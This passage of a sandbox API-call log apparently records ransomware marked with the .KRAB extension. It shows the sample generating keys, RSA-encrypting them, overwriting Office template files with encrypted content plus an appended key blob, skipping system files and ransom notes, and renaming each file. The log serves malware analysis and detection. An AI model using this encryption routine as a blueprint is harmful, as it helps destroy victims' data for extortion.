dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.399] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.400] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.400] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.400] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.400] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.400] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.400] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.401] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.401] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.402] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.402] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.402] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.402] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.402] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.402] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.403] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023c78) returned 1 [0073.403] CryptGetKeyParam (in: hKey=0x1023c78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.403] CryptEncrypt (in: hKey=0x1023c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.403] GetLastError () returned 0x0 [0073.403] CryptDestroyKey (hKey=0x1023c78) returned 1 [0073.403] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.403] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.404] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023c78) returned 1 [0073.404] CryptGetKeyParam (in: hKey=0x1023c78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.404] CryptEncrypt (in: hKey=0x1023c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.410] GetLastError () returned 0x0 [0073.411] CryptDestroyKey (hKey=0x1023c78) returned 1 [0073.411] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.411] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328951[[fn=tabbed arc]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.413] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.413] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.414] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0xe63, lpOverlapped=0x0) returned 1 [0073.437] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffff19d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.437] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xe63, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0xe63, lpOverlapped=0x0) returned 1 [0073.437] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.437] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.441] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.441] CloseHandle (hObject=0x484) returned 1 [0073.445] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.446] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328951[[fn=tabbed arc]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328951[[fn=tabbed arc]].glox.krab")) returned 1 [0073.446] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.447] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.447] lstrcmpW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2=".") returned 1 [0073.447] lstrcmpW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="..") returned 1 [0073.447] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328972[[fn=Tab List]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox" [0073.447] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.447] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox.KRAB") returned 139 [0073.447] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0073.447] lstrlenW (lpString=".glox") returned 5 [0073.447] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.448] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.448] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.448] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0073.448] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox") returned 134 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="desktop.ini") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="autorun.inf") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="ntuser.dat") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="iconcache.db") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="bootsect.bak") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="boot.ini") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="ntuser.dat.log") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="thumbs.db") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.448] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="ntldr") returned 1 [0073.449] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="NTDETECT.COM") returned 1 [0073.449] lstrcmpiW (lpString1="TM03328972[[fn=Tab List]].glox", lpString2="Bootfont.bin") returned 1 [0073.449] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.449] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.449] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0073.450] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.450] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.450] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.450] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.450] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.450] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0073.489] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.489] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.489] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.489] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.489] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.490] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.493] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.496] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x10239f8) returned 1 [0073.496] CryptGetKeyParam (in: hKey=0x10239f8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.496] CryptEncrypt (in: hKey=0x10239f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.496] GetLastError () returned 0x0 [0073.496] CryptDestroyKey (hKey=0x10239f8) returned 1 [0073.496] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.496] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.500] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023b38) returned 1 [0073.500] CryptGetKeyParam (in: hKey=0x1023b38, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.500] CryptEncrypt (in: hKey=0x1023b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.500] GetLastError () returned 0x0 [0073.500] CryptDestroyKey (hKey=0x1023b38) returned 1 [0073.500] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.501] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328972[[fn=tab list]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.501] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.501] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.502] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1318, lpOverlapped=0x0) returned 1 [0073.536] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffece8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.536] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1318, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1318, lpOverlapped=0x0) returned 1 [0073.536] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.536] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.540] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.540] CloseHandle (hObject=0x484) returned 1 [0073.543] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.544] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328972[[fn=tab list]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328972[[fn=tab list]].glox.krab")) returned 1 [0073.545] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.545] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.545] lstrcmpW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2=".") returned 1 [0073.545] lstrcmpW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="..") returned 1 [0073.545] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328975[[fn=Theme Picture Accent]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox" [0073.545] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.546] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox.KRAB") returned 151 [0073.546] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0073.546] lstrlenW (lpString=".glox") returned 5 [0073.546] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.546] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.546] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.546] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0073.546] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox") returned 146 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="desktop.ini") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="autorun.inf") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="ntuser.dat") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="iconcache.db") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="bootsect.bak") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="boot.ini") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="ntuser.dat.log") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="thumbs.db") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="ntldr") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="NTDETECT.COM") returned 1 [0073.547] lstrcmpiW (lpString1="TM03328975[[fn=Theme Picture Accent]].glox", lpString2="Bootfont.bin") returned 1 [0073.547] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.547] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0073.551] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.551] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.551] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.551] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.552] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.552] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.552] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.558] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.559] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.559] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.559] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.559] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.559] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.560] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.564] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023c78) returned 1 [0073.564] CryptGetKeyParam (in: hKey=0x1023c78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.564] CryptEncrypt (in: hKey=0x1023c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.565] GetLastError () returned 0x0 [0073.565] CryptDestroyKey (hKey=0x1023c78) returned 1 [0073.565] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.565] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0073.569] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023eb8) returned 1 [0073.569] CryptGetKeyParam (in: hKey=0x1023eb8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.569] CryptEncrypt (in: hKey=0x1023eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.569] GetLastError () returned 0x0 [0073.569] CryptDestroyKey (hKey=0x1023eb8) returned 1 [0073.569] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.569] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328975[[fn=theme picture accent]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.570] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.570] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.570] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1930, lpOverlapped=0x0) returned 1 [0073.591] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffe6d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.591] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1930, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1930, lpOverlapped=0x0) returned 1 [0073.591] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.591] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.595] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.596] CloseHandle (hObject=0x484) returned 1 [0073.596] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.597] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart 